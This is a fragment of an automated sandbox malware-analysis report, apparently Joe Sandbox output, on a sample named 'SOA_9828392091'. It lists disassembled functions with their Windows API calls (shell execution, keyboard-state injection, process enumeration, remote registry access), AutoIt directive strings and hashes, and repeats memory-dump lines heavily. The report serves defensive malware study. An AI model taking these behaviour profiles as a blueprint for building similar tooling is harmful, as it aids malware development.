                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bdf4310f5535baf49e2f3bfb85dc140b1472ab04faf77937ef62a90fa992f3d
                                      • Instruction ID: 8a35c44bf2cffae8e113319661467cc8a37a2086198d9932ac2fff9b5a3dd79c
                                      • Opcode Fuzzy Hash: 4bdf4310f5535baf49e2f3bfb85dc140b1472ab04faf77937ef62a90fa992f3d
                                      • Instruction Fuzzy Hash: 96718DB1904109EFDF04CF98CC88EAEBB78FF85314F148289F915AA251C734AA05CFA5
                                      Function 00992230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0099225A
                                      • _memset.LIBCMT ref: 00992323
                                      • ShellExecuteExW.SHELL32(?), ref: 00992368
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • CloseHandle.KERNEL32(00000000), ref: 0099242F
                                      • FreeLibrary.KERNEL32(00000000), ref: 0099243E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 4082843840-2766056989
                                      • Opcode ID: c1c051c991089d74a34adefe66182d6ca913af771272cc61e6e139d28f826d99
                                      • Instruction ID: d157bb319469b58e06a0eda51e0fd65ed21ad4a968264225b48de44c9bdf332d
                                      • Opcode Fuzzy Hash: c1c051c991089d74a34adefe66182d6ca913af771272cc61e6e139d28f826d99
                                      • Instruction Fuzzy Hash: 547160B4900619AFCF05EF98D491AAEB7F5FF88710F108459E855AB391DB34AD40CF90
                                      Function 00973BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00973C02
                                      • GetKeyboardState.USER32(?), ref: 00973C17
                                      • SetKeyboardState.USER32(?), ref: 00973C78
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00973CA4
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00973CC1
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00973D05
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00973D26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 510efe1093b6e9618804de0adc23a894442ac79305b9fd884ae96bc086048c50
                                      • Instruction ID: c7739e9e33363720ab8b01f4164348eb0fa45a81206bb60539dce1359b01ddd5
                                      • Opcode Fuzzy Hash: 510efe1093b6e9618804de0adc23a894442ac79305b9fd884ae96bc086048c50
                                      • Instruction Fuzzy Hash: 6251D3A25086D539FB3687248C46BB6BF9DAB46300F0CC588E4DD568C2D395EE84F760
                                      Function 00998FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00998FE7
                                      • GetWindowLongW.USER32(0164BC08,000000F0), ref: 0099901A
                                      • GetWindowLongW.USER32(0164BC08,000000F0), ref: 0099904F
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00999081
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009990AB
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 009990BC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009990D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 573e4149cc56ef5c1a05f170c12c35b476d3e2c39160cc7f70a05643eaa11114
                                      • Instruction ID: 4a017546fcf0aadbaf0b519ece5213febe1f2ac02cd1fd378c16fb9550d6d0a8
                                      • Opcode Fuzzy Hash: 573e4149cc56ef5c1a05f170c12c35b476d3e2c39160cc7f70a05643eaa11114
                                      • Instruction Fuzzy Hash: A2310535658215DFDF208F5CDC85F6537A9FB4A724F144268F929CB2B1CB72A840EB81
                                      Function 009708AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009708F2
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00970918
                                      • SysAllocString.OLEAUT32(00000000), ref: 0097091B
                                      • SysAllocString.OLEAUT32(?), ref: 00970939
                                      • SysFreeString.OLEAUT32(?), ref: 00970942
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 00970967
                                      • SysAllocString.OLEAUT32(?), ref: 00970975
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 75bd135590c70bc1bb19b087399fbf3361c97ddad001cc1e1fc4fa07a05ef959
                                      • Instruction ID: 664b040e1e06a0da1875e50f3518ba2bd0ede5f500876859195eb9859d97b093
                                      • Opcode Fuzzy Hash: 75bd135590c70bc1bb19b087399fbf3361c97ddad001cc1e1fc4fa07a05ef959
                                      • Instruction Fuzzy Hash: 36219777605219AF9B109FA8CC88DBB73ACEB49370B00C525F919DB191E674EC458760
                                      Function 00972472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: e8652d62f3b1ef1c3553a7da679ed5062c007f4b828cf628f2024cc0d46b0355
                                      • Instruction ID: c8b855d2186b281af770f2bd194f38d69d8ecc1049c8dc646f19afc6c526d1b6
                                      • Opcode Fuzzy Hash: e8652d62f3b1ef1c3553a7da679ed5062c007f4b828cf628f2024cc0d46b0355
                                      • Instruction Fuzzy Hash: 1C21377321821177C324EB259C12FBBB3ACEFE5310F54C429F98E97181E7659942C395
                                      Function 00970986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009709CB
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009709F1
                                      • SysAllocString.OLEAUT32(00000000), ref: 009709F4
                                      • SysAllocString.OLEAUT32 ref: 00970A15
                                      • SysFreeString.OLEAUT32 ref: 00970A1E
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 00970A38
                                      • SysAllocString.OLEAUT32(?), ref: 00970A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 2a3788fa3d8656784a00d954f73f3d7b7fe75a7cc9cb7783b52cb6fa8a52b1d3
                                      • Instruction ID: 1af74ec2103e04b2e9ff18090a0d3a948d5bc90c86acba571096c70335e1e72c
                                      • Opcode Fuzzy Hash: 2a3788fa3d8656784a00d954f73f3d7b7fe75a7cc9cb7783b52cb6fa8a52b1d3
                                      • Instruction Fuzzy Hash: 97216276215204AF9B149BACDD89DAB77ECEF49360B00C125F90DCB2A1E674EC419764
                                      Function 0099A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0099A32D
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0099A33A
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0099A345
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0099A354
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0099A360
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 94be7eb6d75b4c50dafba0d9510914b2d73e4221ae4b469d17d02d36b9fb4f12
                                      • Instruction ID: af04cf38d639dae8464d8158d6bc8d84cc6dbd8e4dc10b2800df64239770075d
                                      • Opcode Fuzzy Hash: 94be7eb6d75b4c50dafba0d9510914b2d73e4221ae4b469d17d02d36b9fb4f12
                                      • Instruction Fuzzy Hash: E71190B1150219BEEF159F65CC86EEB7F6DFF08798F014114BA08A60A0C6729C21DBA4
                                      Function 0094CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 0094CCF6
                                      • GetWindowRect.USER32(?,?), ref: 0094CD37
                                      • ScreenToClient.USER32(?,?), ref: 0094CD5F
                                      • GetClientRect.USER32(?,?), ref: 0094CE8C
                                      • GetWindowRect.USER32(?,?), ref: 0094CEA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
                                      • Opcode ID: 2f4973443e2263d9967c070903c72dd4753ad65b62928ead1ba929ac02c7c5ba
                                      • Instruction ID: 17dc908cadd3c4abccffd324b5f281d0c28eed670587313ccfc1a0a0dcc491c2
                                      • Opcode Fuzzy Hash: 2f4973443e2263d9967c070903c72dd4753ad65b62928ead1ba929ac02c7c5ba
                                      • Instruction Fuzzy Hash: A5B13AB990124ADFDB50CFA8C580BEEB7B5FF08310F149529EC59AB250EB34AD50DB64
                                      Function 00991BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00991C18
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00991C26
                                      • __wsplitpath.LIBCMT ref: 00991C54
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscat.LIBCMT ref: 00991C69
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00991CDF
                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00991CF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 1380811348-0
                                      • Opcode ID: 86ad69aa61a50f5ae069d5969252b689d4f0684bf1a67582a7aed59bc8c3fb14
                                      • Instruction ID: 6f47949c24eecbcd22a466368518827a9659125b9efe022b2612c192084c1073
                                      • Opcode Fuzzy Hash: 86ad69aa61a50f5ae069d5969252b689d4f0684bf1a67582a7aed59bc8c3fb14
                                      • Instruction Fuzzy Hash: D0513CB15083419FD724EF24D885FABB7ECEF88754F00491EF58597291EB709904CB92
                                      Function 00992FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009930AF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009930EF
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00993112
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0099313B
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0099317E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0099318B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 3451389628-0
                                      • Opcode ID: ed43f48d21aa0af46c78a3fe46bb07aba0b10fbf0de4cc20682140a17ff4b2aa
                                      • Instruction ID: 2e82fcaadd88ea8d7cd97123dfa25fb78c37f98a6a7b4adc240e4cb29eb21bbb
                                      • Opcode Fuzzy Hash: ed43f48d21aa0af46c78a3fe46bb07aba0b10fbf0de4cc20682140a17ff4b2aa
                                      • Instruction Fuzzy Hash: DB514871108300AFCB14EF68C895E6ABBF9FF89310F04891DF556972A1DB71EA05CB52
                                      Function 009984DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00998540
                                      • GetMenuItemCount.USER32(00000000), ref: 00998577
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0099859F
                                      • GetMenuItemID.USER32(?,?), ref: 0099860E
                                      • GetSubMenu.USER32(?,?), ref: 0099861C
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0099866D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: 75a22c4e10bf1bd8f45abc2269df3f1ec54bf2c63681d9d3c6bedf3985e85dd0
                                      • Instruction ID: e9b302e7cbe1f096007f03c8e8426c9d821ea75d0ea4bde0b0899d4188e1d778
                                      • Opcode Fuzzy Hash: 75a22c4e10bf1bd8f45abc2269df3f1ec54bf2c63681d9d3c6bedf3985e85dd0
                                      • Instruction Fuzzy Hash: 53519F71A00215AFCF11EF68C945AAEB7F4EF89310F1144A9F906BB351DB70AE418B91
                                      Function 00974AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00974B10
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974B5B
                                      • IsMenu.USER32(00000000), ref: 00974B7B
                                      • CreatePopupMenu.USER32 ref: 00974BAF
                                      • GetMenuItemCount.USER32(000000FF), ref: 00974C0D
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00974C3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: 57abab007bdf0a4251cf513bfae7abc5de0a7d5f6aeec36cec0bb02b018968fe
                                      • Instruction ID: 9972a3cc97db4a760bad9d7749694102fcfdfc958a246019a7ff39ddeaec03e9
                                      • Opcode Fuzzy Hash: 57abab007bdf0a4251cf513bfae7abc5de0a7d5f6aeec36cec0bb02b018968fe
                                      • Instruction Fuzzy Hash: F851C171601209DBDF25CF64C988BEDBBF8AF44314F188159E4599B292E3B09D44CB51
                                      Function 0094ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • BeginPaint.USER32(?,?,?), ref: 0094AC2A
                                      • GetWindowRect.USER32(?,?), ref: 0094AC8E
                                      • ScreenToClient.USER32(?,?), ref: 0094ACAB
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0094ACBC
                                      • EndPaint.USER32(?,?,?,?,?), ref: 0094AD06
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009AE673
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
